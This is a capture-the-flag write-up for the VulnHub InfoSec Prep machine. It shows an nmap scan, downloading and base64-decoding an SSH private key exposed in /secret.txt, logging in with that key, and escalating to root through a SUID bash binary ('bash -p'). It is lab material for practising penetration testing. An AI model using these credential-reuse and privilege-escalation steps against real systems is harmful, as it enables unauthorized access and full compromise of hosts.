Home Writeup for InfoSecPrep machine form vulnhub
Post
Cancel

Writeup for InfoSecPrep machine form vulnhub

BoxInfoSec Prep.
VulnerabilitySensitive data Exposure.
Vulnerability explanationprivate ssh key left on sever.
Privilege EscalationExecuting SUID executables (bash)

Nmap scan

nmap scan revealed that Apache httpd 2.4.41 is running on port 80, and robots.txt contains a Disallowed entry: /secret.txt

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap 192.168.1.102 -sV -sC
Nmap scan report for 192.168.1.102
Host is up (0.00067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
|   256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_  256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret.txt
|_http-generator: WordPress 5.4.2
|_http-title: OSCP Voucher – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct  4 08:16:54 2022 -- 1 IP address (1 host up) scanned in 22.49 seconds

Initial foothold

secret.txt conatins a base64 value

1
$ curl 192.168.1.102/secret.txt -O

curl secret

Decoded it and got a ssh private key

cat secret.txt | base64 -d > ssh-key

ssh private key

Used ssh-key to get a session as oscp user

1
2
$ chmod 0600 ssh-key
$ ssh -i ssh-key oscp@192.168.1.102

oscp user

Privilge Escalation

Used find command to list files with SUID bit set.

1
$ find / -type f -perm -u=s 2>/dev/null

find suid

The output showed that /usr/bin/bash is one of them.

bash suid

Ran bash -p and got a root shell

root shell

This post is licensed under CC BY 4.0 by the author.